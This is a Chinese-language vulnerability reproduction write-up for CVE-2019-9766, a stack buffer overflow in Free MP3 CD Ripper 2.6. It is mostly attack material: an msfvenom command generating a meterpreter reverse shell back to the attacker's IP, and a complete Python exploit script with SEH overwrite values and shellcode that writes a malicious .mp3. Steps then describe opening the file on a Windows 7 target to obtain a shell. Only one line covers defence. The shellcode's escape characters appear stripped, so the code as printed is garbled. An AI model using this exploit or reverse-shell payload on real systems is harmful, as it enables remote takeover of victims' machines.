Free MP3 CD Ripper_缓冲区溢出远程代码执行_CVE-2019-9766漏洞复现
一、漏洞描述
Free MP3 CD Ripper是一款音频格式转换器。Free MP3 CD Ripper 2.6版本中存在缓冲区溢出漏洞。远程攻击者可以借助特制的以.mp3为后缀的文件,利用该漏洞执行任意代码。
二、漏洞影响版本
Free MP3 CD Ripper 2.6
三、漏洞复现环境搭建
攻击机 kali ip:192.168.10.136
靶机 win7 安装Free MP3 CD Ripper 2.6版本 ip:192.168.10.171
四、漏洞复现
1.kali利用msf生成反弹shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.136 lport=8888 -f c –smallest
2.构造具有反弹shell的MP3文件
2.1构造payload,然后把payload写入MP3格式的文件
#Stack-based buffer overflow in Free MP3 CD Ripper 2.6
buffer="A"*4116 NSEH="xebx06x90x90" SEH="x84x20xe4x66" nops="x90"*5 buf="" buf+="xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30" buf+="x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff" buf+="xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52" buf+="x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1" buf+="x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b" buf+="x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03" buf+="x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b" buf+="x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24" buf+="x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb" buf+="x8dx5dx68x33x32x00x00x68x77x73x32x5fx54x68x4c" buf+="x77x26x07x89xe8xffxd0xb8x90x01x00x00x29xc4x54" buf+="x50x68x29x80x6bx00xffxd5x6ax0ax68xc0xa8x0ax88" buf+="x68x02x00x22xb8x89xe6x50x50x50x50x40x50x40x50" buf+="x68xeax0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5" buf+="x74x61xffxd5x85xc0x74x0cxffx4ex08x75xecx68xf0" buf+="xb5xa2x56xffxd5x6ax00x6ax04x56x57x68x02xd9xc8" buf+="x5fxffxd5x8bx36x6ax40x68x00x10x00x00x56x6ax00" buf+="x68x58xa4x53xe5xffxd5x93x53x6ax00x56x53x57x68" buf+="x02xd9xc8x5fxffxd5x01xc3x29xc6x75xeexc3" pad="B"*(316-len(nops)-len(buf)) payload=buffer+NSEH+SEH+nops+buf+pad try: f=open("Test_Free_MP3.mp3","w") print "[+]Creating %s bytes mp3 Files..."%len(payload) f.write(payload) f.close() print "[+]mp3 File created successfully!" except: print "File cannot be created!"
2.2然后运行脚本,生成mp3文件
3.把生成的mp3文件放到安装有Free MP3 CD Ripper 2.6的机器上
4.kali开启监听
5.win7(靶机),利用Free MP3 CD Ripper打开mp3文件
6.此时kali(攻击机已经获得shell)
五、漏洞防御
及时更新Free MP3 CD Ripper到最新版本